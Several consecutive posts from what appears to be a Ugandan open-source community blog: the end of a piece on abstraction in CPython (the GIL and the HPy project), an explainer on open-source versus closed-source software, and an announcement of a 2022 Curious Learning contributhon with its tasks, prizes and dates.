We turn our focus on CPython which was first published approximately 30 years ago by Guido Van Rossum. Guido designed the language to be as simple as possible and easy to learn, that's why it's popular today. But he made some design decisions back then that are raising many concerns today. One of the famous internal features is the Global Interpreter Lock often called the GIL. The GIL is supposed to help simplify the way multiple python threads interact with the python state such as dictionaries, lists and tuples to avoid their corruption by many threads trying to modify them at the same time. However, this exerts a heavy toll on multithreaded programs which would like to run multiple python threads in parallel not concurrently. Due to this very real need, many prominent libraries such as Numpy dug down to the C-API layer of cpython and side-stepped the effects of the GIL by releasing it around areas that require high computation and reacquiring it when it's time to interact with python.

Everything seemed calm until the efforts and push to remove the GIL became significant. There have been significant efforts to remove the GIL, however, all of them introduced breaking changes inside CPython which the external libraries rely on. So that means introducing these changes will render thousands of packages and libraries relying on these features useless, something that the CPython community can not let happen.

So there's an apparent need to evolve the internals of CPython to make it fit for the modern era of computation and data processing, but introducing those changes comes at a high cost which has been felt before when the community decided to move from version 2 to version 3. Some libraries never even recovered from that toll of rewriting hundreds of thousands of lines of python code. I've only highlighted the GIL, but many other areas have caused libraries to tightly couple with the python C-API. The problem comes from the issue I stated earlier above, Python exposes its internal state and internal API to external code which causes tight coupling.

There are significant efforts currently underway to solve this problem. One of them is the HPy project being worked on by the PyPy team. HPy is supposed to be a better C-API for the Python language. It's designed to be easily adopted by other implementations and hides the internal state and data of python internals behind a handle (hence the name HPy). The handle is our abstraction between the external code and the python internals, much as the regional mail receiver is an abstraction between Tom and the Mulindwas.

conclusion

Abstractions are a very wide and very important concept in software development. I've not been able to mention a lot of concepts because this is meant to be a short blog post and not a book. I'll hopefully share more information on how to implement abstraction or indirections more efficiently in a future post (only if there's interest in it), but alas, this is the end of this blog post. Catch you in the next post.

In tech terms, open source refers to software where the source code is available to the public. This code can then be seen, modified, and redistributed according to one's preference. However, today, the word open source has become a general term that doesn't only cover the tech aspect.

It covers a broader set of values known as "the open source way." Open-source efforts, projects, and products embrace and celebrate the values of open exchange, team effort, quick prototyping, open communication, and community-centered development.

The difference between open source software and closed source software

Open source software is the term used to describe computer programs whose sources are available for usage and accessible by the general public. This type of software employs code that is freely accessible online for the public to use and alter in any way they see fit.

To use this kind of software, a user usually has to accept the terms of a license which regulates the manner in which that software can be used, researched, modified, and distributed. Some open source licenses, commonly known as "copyleft" licenses, demand that anybody who distributes a modified open source program also distribute the program's source code.

Some examples of open-source software include Android, Firefox, Thunderbird, OpenOffice, Gimp, etc.

Closed source software, on the other hand, refers to computer programs whose source code is not accessible to the general public. It is called CSS in short, and here, the source code is protected.

The software can only be modified by the single person or entity who generated it. Closed source software is often more expensive than open source, and a valid license that has been verified is required to use it. Because of the requirement to have an authenticated license, this tends to put restrictions on the user's ability to modify the software.

The most common examples of closed-source software include mac OS, Microsoft Office, Adobe Reader, Skype, Google Earth, etc.

Despite how tech-like all this sounds, open source is not only applicable to programmers or people in the tech field. As I mentioned earlier, the term open source has become a more general way of describing collaborative efforts to contribute to projects or products.

This means anyone with any set of skills like writing, graphic designing, etc., or ready to learn new ones can join a community of like-minded people like OSCA (Kampala) to contribute to local and global projects in ways that they see fit.

In conclusion, you can look at open source as a willingness to work with others in open-ended ways so that others can see and participate, accepting failure as a chance to grow, and encouraging everyone else to do the same.

We are excited to announce that Curious Learning is partnering with the amazing folks at Open Source for Equality for this July hackathon where you will be contributing open content, Yay!!!

via GIPHY

About Curious Reader

Curious Reader is a digital storytelling platform designed to encourage interactive learning. The platform includes interactions—primarily between animation, text, and audio—that help anyone to learn to read.

The Curious Reader platform makes it easy to update an existing storybook to offer a richer interactive experience or to localize an existing book to other languages. There are several key features that distinguish a Curious Reader book from other learning tools:

1. Self-narration: The displayed text is narrated.
2. Interactivity: Taps to words and graphics produce audio and/or visual responses.
3. Tap to read: The ability to tap on individual words and hear the enunciation.
4. Linked text and graphics: This establishes a relationship between text and graphics.
5. Levelled reading: This allows a single story to accommodate multiple reading levels as a reader becomes more proficient at reading over time.

The Curious Reader platform is used to create web-based apps for Android and iOS smartphones, tablets, and web browsers (Chrome or Firefox).
Best of all, no coding experience is required!!.

About the Contributhon 💡

From 14th July to 12th August, we want to see you build interactive books using the Curious Reader Authoring tool. For this contributhon, you will choose among any of three tasks:

1. Translation - translate (an) English script(s) to a local language(s). Find out how to tackle this task here.
2. Recording Audio. Find out how to record the best quality audio here.
3. Compiling the book(s) into finished form. Find how to do this here.

You will also choose from this list of books, which book you want to localize or make interactive.

• Cicada’s Song
• I am not afraid
• Colors of Nature
• Hide and Seek
• Let’s fly!
• The bee and the elephant
• Friends
• The Lost Doll
• Colors
• Tall and Short

This is an excellent opportunity to unlock your translation and book-building skills with a great open-source project that speaks to one of the Sustainable Development Goals (#4).

If this is your first time using the Curious Reader authoring tool, you'll soon see it's super easy to get started, and there is well-written documentation.

How to participate.

1. Sign up for the Curious Learning track on the OSEQ website. Make sure to check the box "I am applying for the Curious Learning track". Registration ends on 14th July, 2022.

1. After this registration, you will be sent the Curious Learning sign-up form that will help the facilitators understand which book and task you would like to work on and whether you prefer to work alone or in a group. Fill out the registration Google form as soon as possible and then submit it.

2. You will be sent an onboarding email that will contain all the resources that you need to successfully create a Curious Learning book and submit it for consideration for the cash prize at the end of the hackathon.

3. If you face any issues with the Authoring tool or need to make any inquiries, feel free to start a discussion on the Curious Learning GitHub page under the channel #OSEQ hackathon.

4. After submitting your content/book, make sure to fill out the feedback form that will be sent in your email. This will help the Curious Learning team gain valuable insights on how to improve the tool in order to provide you with a better book-building experience.

Only participants who fill out the feedback form at the end of the contributhon will be considered for the cash prize!!

Hackathon prizes 🏆

via GIPHY

Are you ready?!

Complete Interactive books.

• The top 2-3 groups that submit (a) complete interactive book(s) will be awarded Ugx 1,500,000 each.
• Top 1-2 individuals who submit (a) complete interactive book(s) will be awarded Ugx 400,000 each.

Complete sub-tasks

• Top 2 individuals who submit (a) translated story manuscript(s) will be awarded Ugx 100,000 each
• Top 2 individuals who submit (a) recorded audio(s) in local language(s) will also be awarded Ugx 100,000 each.
• Best submission for compiling (an) existing script(s) and audio(s) into an interactive book will be awarded Ugx 200,000.

Evaluation criteria 🔎

Submissions will be judged based on the following criteria:

• Translations of manuscripts will be judged based on the accuracy of translation from English to the local language.
• Recorded audio in local languages will be judged based on accuracy and relatability of intonation of voice, the pace at which sentences are being recorded (remember these are children's books), clarity of audio recordings (no white noise, background sounds, etc), completeness of audio recordings (all individual sentences and words from the manuscript have to be recorded).
• Interactive books will be judged based on overall quality e.g how elements have been placed on each page, accuracy of synchronisation of words, animation and audio, etc.
• Please note that only individuals who fill the feedback form at the end of the project will be considered for the cash prize!

Winners Selection. 💬

Winners will be selected by the Curious Learning team.

Important dates and rules. 📆

• 9th July - Online registration of participants opens
• 14th July - Deadline for registrations and Online launch of the contributhon. Join us for the online launch on Zoom.
• 26th July - Online mentorship of participants
• 12th August - Closure of contributions
• 19th August - Networking event and announcement of winners.

Excited? 😍 Help spread the word ...

Feel free to tag Curious learning at @CuriousLearnGLP and OSCA Kampala at @oscakampala in your tweets and posts about this hackathon. 😊

Need Help? 🙋🏽‍♀️

Join the hackathon channel on the Curious Learning GitHub discussions page to connect with other Curious Reader community members and hackathon participants. Talk to us on Twitter at @oscakampala, @CuriousLearnGLP and @OSEQorg.

Good luck. ✌